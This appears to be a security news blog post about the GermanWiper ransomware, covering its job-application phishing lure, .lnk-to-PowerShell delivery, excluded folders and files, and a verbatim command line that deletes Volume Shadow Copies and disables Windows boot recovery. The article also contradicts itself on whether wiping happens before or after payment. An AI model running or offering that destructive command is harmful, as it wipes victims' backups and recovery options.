GermanWiper, A Diabolical Ransomware Targeting German PC Users
Have you heard of GermanWiper? No, it is not a brand of shaving razor or tissue paper in Germany. The name is very unfortunate, but it is another “ransomware” that is wreaking havoc in Germany and maybe adjacent parts of Europe. Yes, “ransomware” with double quotes, as it is similar to form with other ransomware families, but its actions are totally diabolical in nature. Ransomware in its basic sense is a cybercriminal’s cash cow, encrypt the files of an innocent computer user, then demand money for its decryption.
This is where the “ransomware” features of GermanWiper ends, its only purpose is to destroy user data. In its very code, GermanWiper is instructed to demand BTC 0.15038835 from the victims, its authors even provided a valid Bitcoin address to complete the transaction. The normal behavior is for the ransomware’s command and control servers (C&C) to release the decryption key, unlock the files, and everyone lives heavenly ever after. With GermanWiper, after the payment for the “ransom” is received, it will not proceed with the decryption of the files, but rather it will execute its data-wipe instructions. All files that were previously encrypted are overwritten by a series of 0’s and 1’s, totally destroying the existence of the encrypted data for good.
The virus authors receive the payment, but in the process, they also double-cross the user who paid the ransom. Deleting the valuable data for good, with intense overwrite, there is no hope to recover it ever again, unless the user had a previously known good backup. So how did the victims got infected by GermanWiper? Again, like any typical cyber criminal-made ransomware before it, it came from a phishing campaign. This time around, the target is within the territory of Germany.
The phishing campaign uses a “job application” format, where the game plan is to send unsuspecting users an email from a job applicant under the name Lena Kretschmer. The email contains her desire to apply for a job in the target’s company, with an attached zip file “containing” her CV and a fake PDF file. The PDF is nothing but a Windows shortcut file (a .lnk file) designed to launch PowerShell when opened, with an embedded instruction to download a malicious .hta file. The main module of GermanWiper is then downloaded to the user’s C:\Users\Public directory and executed.
The following folders are spared from being deleted:
- windows
- recycle.bin
- mozilla
- boot
- application data
- appdata
- program files
- program files (x86)
- programme
- programme (x86)
- programdata
- perflogs
- intel
- msocache
- system volume information
GermanWiper will also leave the following files alone:
- notepad.exe
- dbeng50.exe
- sqbcoreservice.exe
- encsvc.exe
- mydesktopservice.exe
- isqlplussvc.exe
- agntsvc.exe
- sql.exe
- sqld.exe
- mysql.exe
- mysqld.exe
- Oracle.exe
GermanWiper basically will spare any file responsible for Windows to work properly, but it will then delete any file that has nothing to do with the basic operations of Windows. Advanced users may depend on Windows Volume Shadow Copy to restore the deleted files, but the ransomware’s authors were already one-step-ahead.
cmd.exe /k vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
GermanWiper executes the command prompt, issues special commands to totally delete the contents of Volume Shadow Copy. As explained, all the wiping actions were done prior to the malware displaying a notification to the user asking for ransom payment (in the German language).
Also Read,
A Brief Look At The Shade Ransomware (2019 variant)
GetCrypt Ransomware Encrypts Files, Brute Forces Credentials